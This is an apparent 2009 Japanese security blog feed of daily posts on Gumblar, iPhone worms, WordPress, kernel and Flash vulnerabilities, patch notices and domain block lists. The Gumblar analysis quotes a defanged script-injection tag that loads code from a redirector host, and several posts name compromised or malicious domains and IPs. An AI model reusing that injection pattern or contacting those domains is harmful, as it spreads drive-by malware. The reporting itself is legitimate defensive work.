本家/.では「パスワードのみ紙に書いて財布に入れておく」というアドバイスが5点を獲得している。パスワードのみ書き留めておき、「何の」パスワードかは頭に入れておけばいいということらしい。

「何のパスワードなのか」もメモに書いてあるっと・・・

----------

GSB:

| 1258246871 | B | [goog-black-hash 1.44446 update]

| 1258246812 | M | [goog-malware-hash 1.17193 update]

| 359634 |

| 975019 |

EoF ... See all content Hide content

Reply

gnome 3 months ago on Wordpress

世界糖尿病デー

埼玉県民の日

大分県民の日

パチンコの日 (1930.11.14 名古屋で初のパチンコ店営業許可)

いい石の日(石工) 「いい(11)石(14)」

アンチエイジングの日 「いい(11)とし(14)」

----------

同一生成元ポリシー

Same origin policy

同一生成元ポリシー

動的なブラウザプログラムが、その生成元のホストにしかネットワークアクセスできないこと、主としてJavaScript等ですが、Flash(Actionscript)も当然、この規範内に入ってなければならない性質のものです。

が、

Flash Origin Policy Attack

Adobe has been advised but has not issued an advisory as of yet, and no patch or easy mitigation information is available. It is possible of course to disable Flash entirely, or even selectively using addons and plugins for your browser of choice.

Flash Origin Policy Issues

ちょっとわかりにくいかもしれませんが、

GMail Flash Exploit

CSRF的な動作が成功しています（別のタグの中にgmailの内容が表示されている）

I would wonder what methods of detecting this exploit exist?

さてはて・・どうなることやら？

----------

Conficker Alert?

ウチにも来てましたね

Conficker patch via email?

典型的な FROM ヘッダ偽装でやってくるので、注意散漫な人は危険かもしれません。

Microsoft does not send patches, updates, anti-virus, or anti-spyware via email (hopefully ever). The following ended up in my inbox this aft. The subject was: Conflicker.B Infection Alert

添付物： Pushdo/Cutwail

2009.11.13 11/41

Pushdo/Cutwail Spambot - A Little Known BIG Problem

----------

WordPress 2.8.6

WordPress 2.8.6 セキュリティリリース

一つ目の問題点は、ベンジャミン・フレッシュ氏が発見した「Press This」ブックマークレットの XSS 脆弱性です。二つ目の問題点はダウィッド・ゴランスキ氏が発見したアップロードファイル名のサニタイズに関するものです。ある Apache 設定のもとでは脆弱性があることが確認されました。これらを発見し、報告してくれたベンジャミンとダヴィッドに感謝します。

WordPress ダッシュボード内、オートアップデートもしくは

WordPress 2.8.6 日本語版リリースのお知らせ

よりアップデートしましょう。

WordPress File Upload and Script Insertion 指標:2

POC:

[Full-disclosure] WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution

----------

Come in! XP!?

Microsoft Updateの後にWindows XPが起動しない？？

小野寺です。

Microsoft Update (11月のセキュリティ更新)を行った後に、Windows XPが起動しないという報告がWeb等でも散見されています。

この件、ですが、 ATI Radeon HD 2400 シリーズの古いバージョンのドライバに起因することが判明しました。

というわけで、セーフモードで起動した後、[Windows XP セキュリティ更新 (KB969947)]を削除（インストールした順番に削除を行う）し、古いRADEONのドライバを削除し、新しいRadeonドライバをダウンロードし、再インストールします。

（※ RADEON 2400 pci-e for WindowsXP : ATI Catalyst™ 9.10 Display Driver for Windows XP Professional/Home Edition

----------

Gumblar hit InterQ

interQ

Gumblar再来襲。interQのホームページスペース「404エラー」改ざん

InterQ

もう何が起きても驚きませんがネ・・

----------

iframe injection into mootools.js

Famous chip shop website battered by malicious Iframe injection

Fish&Chipsで有名なHarry Ramsden'sの公式サイトが陥落している模様。

といってもコレ、mootools.jsの中にインジェクションコードが挿入されているため、判りにくい・・・

86.109.164.61 AS16338 AUNA_Telecom-AS Cableuropa

logcentre.de

www.logcentre.de

www.logcentre.es

logcentre.org

www.movilitas.es

movilitas-consulting.com

www.logcentre.com

logcenter.org

www.logcentre.org

www.logcentre.cz

www.movilitas-consulting.com

Google先生、全スルー

以前もjQuery.jsにインジェクションされた例もありますので注意が必要ですが、改ざんチェックは更に厄介なものになるでしょう。

----------

プラグイン問題

第9回 プラグイン脆弱性問題に決め手はあるのか

by TrendMicro"cneter"

というか、問題提起だけして終わりってのもアレですね・・

そもそも、一般企業にどのくらいFirefoxが浸透してるのでしょうか？

XP+IE6が恐ろしく多いのが実情・・・

----------

Chrome OS next week?

GoogleのChrome OSが来週中にリリースされる

7月に発表されたGoogleのChrome OSプロジェクトは、信頼できる情報筋によると、来週中にはダウンロードして入手できるようになる（今日は11月13日）。Google自身は以前、このOSの初期的バージョンは秋ごろと言っていた。

さ～て、ふたを開けるのが楽しみです。

----------

ぐくった？

Googleの新言語「Go」、10年前に同じ名前の言語が開発されていた？

この件を受けて、フォーラムには「なんでGoogleは名前を付ける前にググらなかったんだ？」などの書き込みが寄せられている。

----------

RIP str0ke 1974-04-29 - 2009-11-03 09:23

Str0ke @ Milworm's Funeral is This Friday

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM.

ご冥福をお祈りいたします。

dmnlk 様、情報感謝です。

----------

Google Safe Browsing STATUS:

| 1258160416 | B | [goog-black-hash 1.44374 update]

| 1258160402 | M | [goog-malware-hash 1.17169 update]

| 351260 | 現在ブロック中

| 963372 | 過去にブロックされたものを含むログ

EoF ... See all content Hide content

Reply

gnome 3 months, 1 week ago on Wordpress

洋服記念日

皮膚の日 イイヒフ（1112）

----------

Adobe Photoshop

Workaround available for potential Photoshop Elements privilege escalation issue

影響下にあるソフトウェア：Photoshop Elementsのバージョン8.0/7.0

ログイン可能なローカルユーザないし、物理的なアクセスが可能な第三者による任意コード実行の可能性がある

ということで、対処したほうが望ましいという "moderate"の警告を発しました。

コマンドプロンプト上で

PSE7

sc sdset AdobeActiveFileMonitor7 .0 D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)

PSE8

sc sdset AdobeActiveFileMonitor8.0 D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)

使用中の方は実行しましょう（笑）

Photoshop Elementsに権限昇格の脆弱性、Adobeが回避策を公開

アドビがPhotoshop Elementsのセキュリティホールを修正

余談：

確定：Adobe、従業員の9%を削減へ

----------

暗黒の火曜日（日本は水曜）続報

忘れていましたが、昨日のMicrosoft Monthly Update には Officeが含まれており、（当然） MacOSにも影響があるのでした。

November’s Patch-Tuesday roundup…

自動アップデートになっていない方用：

Microsoft Office 2004 for Mac 11.5.6 Update

Microsoft Office 2008 for Mac 12.2.3 Update

Open XML File Format Converter for Mac 1.1.3

また MS09-064のライセンス ログ サービスは、Windows 2000 ServerにおいてデフォルトでONになっており、注意が必要です。

Windows 2K Server Patch Update

Windows サーバー オペレーティング システムのライセンス ログ サービスについて

Details on the License Logging Service vulnerability

Microsoft fixes kernel, Office flaws

Windows 2000の寿命は 2010年6月30日までです。

----------

Firefox is not Invulnerability?

修正：

昨日書いた gitは JITエンジンでした。（gitはSubversionなどのようなソースコード管理システムですね）

JITのコードが修正されたのは Firefox 3.5.1です（影響があったのは 3.5.0)

訂正してお詫びします。（結城様、感謝です）

で・・その「Firefoxは脆弱性最多」という記事に対して、正論での反論が出ています。

Webブラウザのセキュリティ問題を考える上での鉄則 - Mozilla Flux

脆弱性の数に危険度を掛け合わせた総合評価をなぜ発表しなかったのか。セキュリティ問題を考える上での鉄則を踏まえないようでは、報告の信憑性にもかかわるというべきだ。

概ね賛成ですが、それでもやっぱり脆弱性が多いなぁとも思いますね。

このへんはプラグイン絡みもありますので、一概に言えないのですが、アップデート！というウィンドウが開いただけでパニックに陥るユーザもいて、バージョンアップを頻繁に繰り返すことに対する一部ユーザの不信感もあるのも事実です。一般のユーザは個々の脆弱性の重要度とかは気にしないでしょうから・・・・

（※Chromeのようにまったく気がつかずにアップデートさせてしまったほうが幸せなのかもしれませんね・・笑）

----------

それでもGumblarは続いている

しつこいですか、そうですか（笑）

KasperskyがGumblarのヒエラルキー構造を図にするとこんな感じになりました。

The Gumblar system

ちょっと解説に手を加えるなら

ちょっと修正 : うまやど様ありがとうございます。

Redirector:

末端の HTMLインジェクションを受けているサイト

＜script src=hXXp://redirector.domain/hoge/hoge.php ＞＜/script＞＜body＞

を埋め込まれている

Infectors:(A)

phpが駆動可能なサイト

eval()関数を使用して、難読化されたコードが挿入されている

例：

Infectors:(B)

phpが駆動可能なサイト

id=nn (12 13が多用されている）の末尾番号により異なるExploitsを仕掛ける、いわばダウンロード先

上記の例で言うと articles. koraja. comがそれに当たると思われる。

Injectors:

完全に制御下に堕ちたと思われるサイト、おそらくSSHも使用可能

InfectorやRedirectorにインジェクションコードを埋め込むサイト

These websites host a generic php backdoor which lets the owner execute any php code on the webserver.

俗に言う「踏み台」

Dispatcher:

完全に制御下に堕ちたと思われるサイト、あるいは防弾ホスト

盗んだFTP Credentialの収集先

そして、この図内には居ないのですが、自分のサイトを持っていない「感染者 Victim」がこの数倍(40000 × n)は居るのではないか？と推測されています。またC&Cを潰すには、Injectorのアクセスログが入手できないと根っこのDispatcherにはたどり着けない（C&Cの根元に到達できない）でしょうが、なかなか難しそうです。

There isn't a lot of information about them yet and it's unclear if they're compromised as well.

もし、Dispatcherも感染サイトだとしたら・・・

jyake様のレポートでは、攻撃が一時中断されているようですが、Injectorがテイクダウンされるまでその下部組織も動き続けますので、犠牲者が自動的に膨れ上がっていく計算になります。

Why is Gumblar so widespread? The answer is quite simple: it's a fully automated system. It's a new generation of self-building botnets. This system is actively attacking visitors of a website and once these visitors have been infected with the Windows executable, it grabs FTP credentials from the victim machines. The FTP accounts are then used to infect every webpage on new webservers. This way the system extends the number of infected pages, thus attacking more and more computers. The entire process is automated and the owner of the system just needs to adjust the system and update the Trojan executable which steals passwords and the exploits used to attack the browser.

まさにbotねずみ講ですね、これじゃ・・

そういえば、一部感染サイトのお知らせに

「このウィルスは HTMLをターゲットにしているため、HTMLを使用しないより安全なシステムに変えました」のような記述があったのですが・・・

コメントは避けよう・・・

----------

微妙に時間切れ気味

今日はよく読まないとマズソウなニュースが多いんです。

--

New Injection

Hackers Use Twitter API To Trigger Malicious Scripts

Twitter APIの"callback"を悪用した新しい形のインジェクションです。

これは見つけにくい・・・

--

Apple today shipped Safari 4.0.4

Apple Safari exposes Windows to drive-by download attacks

Safari Windows を使っている方、また付近で PCにあまり詳しくなく、iPodを持っている方がいたら（勝手に）Safariが入っている可能性がありますので注意喚起をしておきましょう（苦笑）

--

ARPキャッシュ汚染による中間者攻撃？

Layer 2 Network Protections against Man in the Middle Attacks

データリンク層（layer2)によるスプーフィング（成りすまし）が成功してしまうと、そのセグメント内のすべてのパケット盗聴の恐れがある・・・という話かな？

すみません、よく読んでないです・・・

--

Seven keyholders for the DNS root zone

いよいよ、１２月から換装作業が開始される DNSSECですが、キーホルダーが７つになり、Zone Signing Keys (ZSK)の交換タイミングなどの取り決めが発表されています。

参考:

DNSSEC Key Timing Considerations -- Draft

難しい・・・・

そういえば、現在 IETF 76 - Hiroshima, Japan が開催中なのですね

--

Another iPhone Attack

Truly malicious iPhone malware now out in the wild

If you do activate SSH on your jailbroken iPhone, be sure to take the warning to change the default passwords for both the "root" and "mobile" users seriously.

というか、

It’s obvious that users of jailbroken iPhones are leaving themselves open to malicious attacks. What was originally theoretical has been realized and should make iPhone users stop and think before jailbreaking their phone.

のほうが重要そうですが・・

iPhone欲しいよ～

--

Panda Cloud Antivirus

Panda Cloud Antivirus、ベータ版から正規版へ。世界同時リリース

（パーソナル用途）無料アンチウィルスに新しい選択肢が！（といってもかなり前からβテストしていましたが）

MSE

Avira

Avast! (小規模企業むけも有)

AVG

・・・あと何かあったかな？

--

Block List DNS-BH

198 new domains to blacklist -- 2009.11.09

New domains for your dns redirection:

botnet, phishing domains -- 2009.11.06

Sources include blog.fireeye.com, ww.rbl.jp, malwaredomainlist.com, and others:

--

MalwareURL 復旧おめでとうございます（DDoSだったのかも？）

--

Windows 7 ユーティリティ、GPL プロジェクトのコードを一部「拝借」している？

MS、「Windows 7」移行支援ツールの配布を中止

GPL汚染っと・・

----------

GSB:

| 1257883248 | B | [goog-black-hash 1.44143 update]

| 1257883201 | M | [goog-malware-hash 1.17092 update]

| 345923 | Affected

| 943794 | Logged

EoF ... See all content Hide content

Reply

gnome 3 months, 1 week ago on Wordpress

----------

エレベーターの日

トイレの日 「いい(11)ト(10)イレ」

技能の日 (1970年国際技能競技大会日本開催)

井戸の日 「いー(1)井(1)戸(10)」

断酒宣言の日 「もう飲めんばー(Nobember)酒止(10)まる」: アルコール依存症

----------

iWorm'

JailBrokenは「ハッキングツール」ではなく、Appleの認めていないアプリを動作可能にするためのツールだという指摘をうけました。

dmnlk様、ありがとうございます。

どっちかというとチートツールなんでしょうかネ？

とりあえず、iPhoneユーザ各位（私も欲しいよ～）に置かれましては、デフォルトになっているrootパスワードを変更したほうがよいかと思います。

この壁紙になってる人は誰？

初のiPhoneワームを発見

「初のiPhoneワーム」をセキュリティ企業が発見

世界初の「iPhoneウイルス」出現、“脱獄”ユーザーを狙う

First iPhone worm discovered - ikee changes wallpaper to Rick Astley photo

Ikee Worm Rickrolls Jailbroken iPhones

iPhone worm spreads via default password

SANSの切り口が一番楽しいかな？

80's Flashback on Jailbroken iPhones

Rick Astley

リックロール : 「釣り」の先駆け的なもの・・・らしい

Rick Astley - Never Gonna Give You Up

----------

Big Bird

先日からGoogleのTOP絵が、セサミストリート特集になっていますが、Googleが何かやると、当然マルウェアのターゲットにされるわけで・・

Rogue Anti-Spyware Targets Sesame Street’s Big Bird

※パーマリンクが機能していないので、TopLinkです。

偽セキュソフトへの誘導

----------

錯綜

マルウェア「Gumblar」のホーム・ドメインが復活

gumblar.cnは既に死んでますが、そもそもC&Cの大元がどこなのか不明なので手のつけようがありません。

malwareURLの今日の項目に、"Compromised website / Directs to Exploits" が大量に登録されています。全部チェックしたわけではありませんが、おそらく Gumblar'ed でしょう（苦笑）

※クエリリンクを貼らないで言われているので、検索クエリは自分で行ってください。

ちらほらと日本の国旗が見えますね・・・

このへんのサーバは殆どがバーチャルホストで多重化されているはずなので、IPベースでブロックされると巻き添えが多数出そうですね。

----------

交錯

Gumblar以外の攻撃も交錯しています。

Koobface

Koobface Abuses Google Reader Pages

ZeuS/Zbot(攻撃対象をMySpaceに変更）

Zeus Malware Moves to Myspace -- GarWarner

MSN Phishing

More on MSN scams ......

もう何がなんやら・・

----------

Zen Cart

ECサイトソフトウェアはなぜ更新されないのか

止められないという強迫観念があるから・・・かな？

----------

指が足りません

18ボタン+アナログスティック搭載のOpenOfficeMouse発表、OpenOffice.orgに最適

価格は74.99ドル。

----------

釣られた!?

マクロを組んで作業は「実力」ではない？

要約すると、「エクセルのマクロを活用して事務処理をしていたら、『それはお前の実力じゃねぇ！ズルい！』と文句をつけられた」という話だそうだ。

#!/bin/bash

----------

Google Safe Browsing STATUS:

| 1257764442 | B | [goog-black-hash 1.44044 update]

| 1257764415 | M | [goog-malware-hash 1.17059 update]

| 340016 | 現在ブロック中のドメイン

| 931057 | 現在までにログに取られたドメイン

EoF ... See all content Hide content

Reply

gnome 3 months, 1 week ago on Wordpress

[WARNING]

IRC経由で警報が飛んできました。

立命館大学　2009年度学園祭ホームページが陥落しています。

Googleセンセイの設定では

rits-fes-by-e2　.net/ : THROUGH

rits-fes-by-e2　.net/bkc/ : MALICIOUS

となってますが、どっちにも悪意コードが埋められています。

学園祭が今日までのところと翌週のところがあるようですので、今日、このページを踏む方が増えると思われます。

--

更に攻撃が多段化してますね

スクリプト埋め込み先：

atddlgeo-ucad　.dk

Google : THROUGH

ダウンロード先：

articles　 .koraja　.com/

Google : THROUGH

逆引き:

p4p-i .geo .vip .re4 .yahoo .com

AS14779(INKTOMI)

Yahoo-RE1 Yahoo RE1 datacenter

Yahooサーバ内、AltaVista管轄の部分ですか・・・

被害者とはいえイメージダウンは避けられないでしょうね

しかもこのサーバ、あちこちで悪意物（汚物）を撒き散らしている様子・・

MalwareURL search "AS14779"

MDL search "14779"

注意しましょう（棒読み）

※そろそろ注意のまとめを作らなきゃ・・・ ... See all content Hide content

Reply

gnome 3 months, 1 week ago on Wordpress

ロシア革命記念日

鍋の日

知恵の日

紀州山の日 (和歌山県)

----------

TEH IMPACT of GUMBLAR

Errors Not Slowing Down Gumblar Attacks

ScanSafeの解析データは顧客のFirewallのデータを集計していますので、実際の企業で発生していると推測される事態の母集団としては最適でしょう。そのデータによれば、10月のMalware-Blockerのうち、28.8%がGumblarに関連するものであったとしています。この数字は、５月の Gumblar-OUTBREAKの２倍にあたります。数千の陥落サイト群が複雑に絡み合った Gumblar-Botnet群による攻撃は、５月のそれよりも更に高い効率を上げていると推論しています。

Gumblar "A" Record Down

Gumblarの再攻撃によって陥落した２つのサイト群（クラスター）のうち、第一次攻撃に使用されている .php 挿入先の一つに、 "gumblar.cn" が存在したらしいです（苦笑）

現在は有効なAレコードがありませんが、未だに DNSには登録されています。

これらの陥落サイト群のオーナーが全てGumblar-BOTに感染しているのかどうかは不明ですが、FTPのログイン情報が抜かれていることだけは間違いありません。しかし、尋常な数ではありません。

想像ですが、FTPやPOP3のフリーメールを運用しているサーバと同一セグメント上のPCが感染し、パケットスニファされた可能性も否定できません。

専守防衛的対処策：

FTP(Port21/20)の使用中止 → FTPS /SFTP(SCP)への換装

(※Shellを空けてくれるところは少なそう・・)

Telnet・・は流石に常用している人は居ないでしょうが・・・

POP3の使用中止 → POP3+SSL(Port995) / POP3+TLS(Port110)への換装

IMAPの使用中止 → IMAP+SSL(Port993) / IMAP+TLS(Port143)への換装

このへんは、ホスティング会社も連携しなければ意味がないんですけどね～

参考：

FTPには対策を施さないといけない -- 2008.05

各プロトコルの安全性 -- RAT portal

pop3はどうしても危険なのか？

※この部分で、自分の傍のセグメントに感染BOTが存在していると、安全ではなくなります。

----------

Chrome update

最新：3.0.195.32

Stable Channel Update -- 2009.11.05

Google closes vulnerabilities in Chrome 3

High-risk flaw dings Google Chrome

Chromeは自動でセキュリティアップデートされます。

----------

Firefox update

最新: 3.5.5

バグフィックスのみ・・？

セキュリティ系の問題点ではないようです。

----------

Bot叩き

Smashing the Mega-d/Ozdok botnet in 24 hours

against Mega-d/Ozdok

Botnet退治はもぐらたたきなんですけど、一致協力すればきっと・・たぶん・・

----------

偽のセキュリティ対策ソフトの脅威が再び拡大！

コンピュータウイルス・不正アクセスの届出状況[10月分]について

今頃？とかおもっちゃだめですよ（苦笑）

昨今の偽セキュソフトは、機能的にBOT端末と同じバックドア型が多いので、危険度はきわめて高いです。

参考：

「過半数のユーザーは『偽ソフト』を知らない」、IPAの調査

----------

Flashホール

Facebook and Myspace bolt Flash backdoors

cross-domain-policyはflashがスクリプトを実行する際に、例外的にクロスサイトスクリプトを認めるという定義です。FaceBook/Myspaceはこの指摘を受け、セキュリティホールを修正しましたが、他のSNSには残っていると思われます。

参照:

Flash，JSONでのクロスドメインアクセス

----------

Tokyo and Kyoto

Tokyo

Greetings from Tokyo…

PacSec 2009 アジェンダ

Kyoto

AVAR国際会議へようこそ

「AVAR 2009」からこんにちは！

AVAR 2009

カスペのメンバー怖いよ！

----------

去り行くもの

奈良先端大のIRCサーバ、撤去の見込み

nara.wideには本当にお世話になりましたね・・・

IRCそのものが消え去ろうとしているのでしょうか

昨今ではBotnetのC&Cが一番大きな用途なんですかね・・・

今までありがとうございました。

----------

さぁ・・Win7だ

インストール開始！

----------

Google Safe Browsing STATUS:

| 1257555616 | B | [goog-black-hash 1.43869 update]

| 1257555602 | M | [goog-malware-hash 1.17002 update]

| 324983 | 現在ブロック中のドメイン

| 879127 | 現在までにログに取られたドメイン

EoF ... See all content Hide content

Reply

gnome 3 months, 2 weeks ago on Wordpress

電報の日

いい5世代家族の日(製薬会社 ノバルティス制定)

ガイ・フォークス・デイ (火薬陰謀事件)

いいりんごの日

Burn ALL GIFs day(全てのGIFを焼き尽くす日)

日本国内でも2004年6月20日に特許が失効した

----------

E M E R G E N C Y

Gumblar revenge

一度引いたかに見えた Gumblar.X ですが、予想外に早い復活です。

gumblar.x

404になぜか難読化コード・・・

Gumblar（GENOウイルス）再来襲。11月4日再始動！

一方、海外フォーラムでは WordPressを中心とした PHPベースのCMSで妙なエラーメッセージが頻発しているとの話が飛び交っています。

Gumblar Breaks WordPress blogs and other complex PHP sites

Needless to say that standard WordPress files index.php and wp-config.php don’t contain any eval() functions. This means that some alien, presumably malicious, content was injected into the files.

やっぱりオマエの仕業か・・・（苦笑）

あまり見たくない検索結果：

Search: "previously declared in" "index.php" "wp-config.php" eval code

国内にも・・

wp-configを書き換えされた場合の対処方法

とりあえず！

WordPress, Joomla! その他のPHPベースのCMSを使用中の方は、サーバー内のコードファイルとローカル内のコードファイルに矛盾が生じていないかチェックしてみてください。

WordPress上のExploitsコードのスキャナーは以下のようなサイトがあります。

WordPress Exploit Scanner (※自分は試していませんので自己責任でお願いします。)

また、バックドアを開けられているかもしれないと疑心暗鬼に陥っている方は以下のサイトを参考にして、サイト内ファイルをチェックしてみてください。

How to find a backdoor in a hacked WordPress -- Nothing to see here

※Shellが使えるなら rsyncでローカルとの同期が無難です。

The Low-Down on Daonol

そろそろウィルス・マルウェア名称の統一を図ってください。

----------

脆弱性情報 by Hitachi

チェックしておきたいぜい弱性情報＜2009.11.04＞

Oracle

Apache 2.2.14

Adobe Reader，Acrobat 9.2(and other)

and Firefox Plugin-check

BGM:リンク無（まだスピーカつながっていません！）

----------

Linux Karnel

こっちも深刻です。

Hole in the Linux kernel allows root access

mutex (mutual exclusion)を内封した特定の状況下にある Linuxカーネル上でpipe_read_open(), pipe_write_open() or pipe_rdwr_open()関数を使用した際に発生するそうで、PoCが出ています。

CVE-2009-3547: Linux kernel Pipe NULL Pointer Dereference Race Condition -- xorl %eax, %eax

CVE-2009-3547は非公開脆弱性

CVE-2009-3547 kernel: fs: pipe.c null pointer dereference

RHE5: Important: kernel security and bug fix update

Red Hat update for kernel 指標:2(Less)

CentOS/Fedora Coreは現時点では不明ですが、そのうち修正を出してくるでしょう。

----------

BlackBerry + Lotus Notes + ActiveX

こんな組合せの人がどのくらいいるのか？　という疑問はともかく・・・

BlackBerry Desktop Software Lotus Notes Intellisync Arbitrary Code Execution 指標:4(Highly)

BlackBerry Desktop Managerの3.x 4.x 5.0を使用中の方で、LotusNotesの同期用ActiveX(Intellisync)を使用中の方は、至急 5.0.1 にアップデートしてください。

Vulnerability in the BlackBerry Desktop Manager allows remote code execution

※読むのにJavaScriot必要・・・

Research In Motion (RIM) has tested the following software to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected.

software: BlackBerry Desktop Software version 5.0 and earlier (on all platforms)

Component/Functionality: IBM® Lotus Notes® Intellisync®

Severity Rating: 9.3

Download : BlackBerry 5.0.1

----------

Roundcube Webmail

Roundcube Webmail Project が提供する Roundcube Webmail は、オープンソースのウェブメールです。

Roundcube Webmail におけるクロスサイトリクエストフォージェリの脆弱性

ユーザの意図しないメールが送信される可能性があります。

Roundcube Webmail におけるクロスサイトリクエストフォージェリの脆弱性

ユーザの意図しない情報が登録される可能性があります。

Update to 0.3.1 released

----------

微妙に時間切れ（引っ越し中のため、床がグチャグチャなのです・笑）

チェックしきれなかった他の項目：

Killing the beast...Part 4 (Ozdok)

Ozdok a.k.a Mega-d is one of those botnets that has been very successful flying under the radar over the past few years.

どっちもあまり聞かない名前ですね・・

Amazonを騙るスパム zbot／ZeuSとCutwailスパムの共通性

ってだけですが、こいつらの送信者は同じ人、もしくは同じボットネットを利用してるのかなと。

今回の Bredolab、Gumblar、ZeuS、8080(Iframe-N/T)の「インジェクション・バッティング」ですが、感染Botを売買しているグループが２重・３重売りしてるんじゃないかな？とか勘ぐっています。

セキュリティ企業のM86 Security、フィンジャンを買収

声明によると、米国に拠点を置くFinjan SWが独立した企業として残り、マルウェア検知の知的財産を保有するという。

あらあら・・分裂ですか・・・ScanSafeは平和的M&Aだったのかなぁ？

DOWNAD/Conficker Turns 1yr

もう一年経つんですよね

今度のSafariのバグはiPhoneユーザの財布に大きな穴をあけるかも

国内ならまぁ問題ないでしょうけど、海外（定額ではありません）で使っていると悲惨な目に遭いそうです。

Gmailに「勝手に既読にするバグ」あり―応急処置はこちら

いずれにせよ、応急処置の方法をリアルタイムで教えてくれた皆さんに感謝だ。IMAPギークの諸君。もしGmailのBODYを取得しているなら、PEEKモードをTRUEに設定すること。

感謝！

Windows/MS Officeのシリアル番号を紛失したら「The Magical Jelly Bean Keyfinder」

な・・なんてタイムリーな（苦笑）

----------

EoF ... See all content Hide content

Reply

gnome 3 months, 2 weeks ago on Wordpress

ユネスコ憲章記念日

国士舘大学（国士舘義塾）創立記念日

芝浦工業大学（東京高等工商学校）創立記念日

文化放送の日（11月3日に引き続き、2日連続で）

----------

引越屋さんが来るまでにどこまでまとめられるかな・・

----------

SUN Java 6 update 17 rolled out

Update Release Notes -- Changes in 1.6.0_17 (6u17)

1.6.0_17 (6u17) での変更点

Bugfixセクションに大量のリストがありますので、セキュリティを含めて必須アップデートだと思われます。

JREとJDKもバージョンが上がっていますので、開発者の方もお忘れなく

Java SE ダウンロード

----------

Shockwave updated

昔は Shockwave Flashと呼んでいたので呼称に混乱が有りますが、Shockwaveは Director Shockwave で、既に製品そのものは風化してしまっています。

Security updates available for Shockwave Player

Shockwave Player version 11.5.2.602

Security Bulletin - Adobe Shockwave Player

Shockwave Plug-insがどうしても必要な方はUpdateを、必要無い方はPCからの削除を行う良い機会です。

※Flashとは全く別のコンポネンツです。

Adobe Shockwave haunted by critical security holes

----------

MalwareBytes complains..

MalwareBytesはウィルス・ワーム・トロイ・ルートキット等の悪意を持つソフトウェアをスキャンして取り除くツールで、日本での知名度は高くありませんが、海外では HijackThisと並んでよく使用されています。

IOBit Steals Malwarebytes’ Intellectual Property

で、そのソフトウェアが中国の IOBitに盗用されていると非難、定義ファイルに "Don't Steal Our Software"と表示させるスキームを定義し、IObit上で表示させるという荒業に出ました。（笑）

Malwarebytes accuses rival of software theft

さすが・・シャレが効いています

----------

iRansom

iHacked: jailbroken iPhones compromised, $5 ransom demanded

オランダのiPhoneユーザの間で起こった iHacked 事件（苦笑）

「お前のiPhoneはロックさせてもらった！」ということですね。

Dutch hacker holds jailbroken iPhones "hostage" for €5 (Updated)

（注意：記事内のリンクには評価の低いリンクがありますので、クリックは慎重にお願いします）

しかも、犯人グループが謝罪と解除方法のポストを行ったとしています。

----------

こんな愛は願い下げ

Opachki, from (and to) Russia with love

Opachkiという新しいタイプのトロイの木馬が流行しつつあるということです。

最大の懸念は、レジストリの多数のエントリを消してしまうため、セーフブート等の回復手段が効かなくなる点にあります。

Opachki Link Hijacker Trojan AnalysisPacked.Win32.Krap.ah

恐ろしい数のレジストリを削除しています。

また、最大勢力のZeuSが既にインストールされている場合、そのエントリを削除する機能も備えています。

出る杭は打たれるんでしょうかね？

----------

ワーストTLDリスト

SURBL now posting abuse statistics for TLD's

なかなか面白い切り口ですね。

SURBLは、spamやマルウェア配信で abused とされたドメインが、どのTLDで多いのか統計を取り結果を公表しました。

01237926com

0272591cn

0334818net

0418994info

056986us

063342org

073329ru

082966at

091534eu

101501es

111265biz

12995uk

13941in

14687sg

15545pl

16432de

17237im

18216hk

19192cd

20175cc

com net info biz はともかく、圧倒的ではないですが・・例のアレが（笑）

あと、usも意外と多いんですね

----------

Symantec Altiris

Security Advisories Relating to Symantec Products - Symantec Altiris Deployment Solution and Notification Server Management Web Console Browse and Save File ActiveX Overflow

Symantec Altirisは、今年の３月に買収した Altiris社の製品である統合型サーバ：クライアントバージョン管理ツールで、別名「ライフサイクル管理ソリューション」です。

今年の９月にも似たような脆弱性がありましたが、ふさぎ切れていなかったようで・・

セキュリティ アドバイザリー - Symantec Altiris Deployment Solution、Notification Server、Management Console の FileDownload ActiveX コントロールに複数の脆弱性 -- 2009.09.22

だからActiveXは・・・

----------

MS09-054

Update released for MS09-054

累積的なセキュリティ更新プログラム 974455 をインストールした後、Internet Explorer で VBScript スクリプト エラー メッセージ "型が一致しません" が表示される

対処済みっと

----------

錯綜するインジェクション攻撃

それでなくても、 ZeuS/Bredolab/Gumblar/8080と入り乱れて勢力抗争らしきことまでやってるというのに・・

Mal/Iframe-N: Another winning infection?

Sophosの解析では Iframe-N(Van Morisson 公式サイトを汚染していました）がTopに立っているとのことです。

使用している脆弱性はいつも通りです。

----------

DNS-BH

[WARNING]

Urgent Additions: google-analystisks .us & thefeedwater. com

google-analystisks .us

thefeedwater. com

を取り急ぎブロックするように！　とのことです。

240+ zeus, phishing, malicious domains

Over 240 zeus, phishing, harmful domains added. Sources include ddanchev.blogspot.com, antiphishing.reasonables.com, zeustracker.abuse.ch:

ZeuSのドメインはブロックしてもしてもしてもしても・・キリガナイんですけど、まぁ・・

----------

iBotnet

MacOS X上で拡散しているとうわさされる iBotnetですが・・

iBotnet: Researchers find signs of zombie Macs

海賊版のiWorkに混入していた～その後の話を全く聞かなかったので、終息していたのかな？とか思っていましたがそうでもなかった様子。

----------

詐欺的なソーシャル・ゲームシステムの駆逐

昨日の記事から早くも動きが・・

Zyngaがゲームから詐欺まがいの削除に乗り出す, 迅速な対応に拍手を！

RockYouも詐欺まがい広告を止めると宣言―Facebook自体はどう対応するのか？

騒ぎが拡大する前に手を打つのはリスクヘッジの基本ですからね

----------

.日本 ほしい？

ICANN、国別コードトップレベルドメインにアルファベット以外の文字を承認

いりません

----------

GSB蒐集サーバ停止中

EoF ... See all content Hide content

Reply

gnome 3 months, 2 weeks ago on Wordpress

文化の日は1948年までは明治節）

文化勲章授章式

まんがの日(手塚治虫氏の誕生日。漫画の日は2/9の命日に制定されている）

ハンカチーフの日(マリー・アントワネットがルイ16世に「ハンカチーフの形は正方形にすべき」という政令を発布させたことに因む)

レコードの日

いいお産の日

ゴジラの日

みかんの日

文具の日

全日本剣道選手権大会

----------

